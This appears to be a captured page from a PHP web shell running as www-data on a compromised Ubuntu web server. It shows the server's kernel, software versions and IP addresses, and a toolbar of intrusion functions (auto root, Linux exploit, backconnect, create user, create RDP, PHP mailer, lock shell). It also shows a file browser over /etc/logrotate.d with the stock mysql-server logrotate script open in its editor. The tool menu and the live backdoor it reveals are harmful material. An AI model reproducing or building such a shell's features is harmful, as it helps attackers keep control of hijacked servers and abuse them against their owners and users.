Linux uiet.co.in 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.0.165 | : 216.73.217.2
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.25
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
logrotate.d /
[ HOME SHELL ]
Name
Size
Permission
Action
alternatives
120
B
-rw-r--r--
apache2
433
B
-rw-r--r--
apport
126
B
-rw-r--r--
apt
173
B
-rw-r--r--
bootlog
91
B
-rw-r--r--
btmp
130
B
-rw-r--r--
certbot
82
B
-rw-r--r--
cloud-init
144
B
-rw-r--r--
dbconfig-common
107
B
-rw-r--r--
dpkg
112
B
-rw-r--r--
fail2ban
354
B
-rw-r--r--
mongodb-server
151
B
-rw-r--r--
mosquitto
237
B
-rw-r--r--
mysql-server
1.05
KB
-rw-r--r--
php8.1-fpm
215
B
-rw-r--r--
ppp
94
B
-rw-r--r--
redis-server
124
B
-rw-r--r--
rsyslog
374
B
-rw-r--r--
ubuntu-pro-client
270
B
-rw-r--r--
ufw
209
B
-rw-r--r--
unattended-upgrades
235
B
-rw-r--r--
wtmp
145
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mysql-server
# Flush all mysql server logs together using mysqladmin flush-logs. # mysqld must be active for the script to run successfully. /var/log/mysql.log /var/log/mysql/*log { daily rotate 7 missingok create 640 mysql adm su mysql adm compress sharedscripts postrotate # Confirm that the mysql service is running and that mysqladmin # exists as it is needed for flushing logs. If not, ignore this # rotation as mysql-server has likely been removed or is inactive. systemctl is-active --quiet mysql || exit 0 test -x /usr/bin/mysqladmin || exit 0 # Run mysqladmin using the debian.cnf configuration to rotate logs. MYADMIN="/usr/bin/mysqladmin --defaults-file=/etc/mysql/debian.cnf" # Ping mysqld to confirm it is responsive, which is required for flushing. $MYADMIN ping >/dev/null 2>&1 PING_STATUS_CODE=$? if [ "${PING_STATUS_CODE}" -eq "0" ]; then # Flush all server logs. $MYADMIN flush-logs else # The server is down, or debian.cnf is bad. Return error to show # that the logs could not be flushed. exit 1 fi endscript }
Close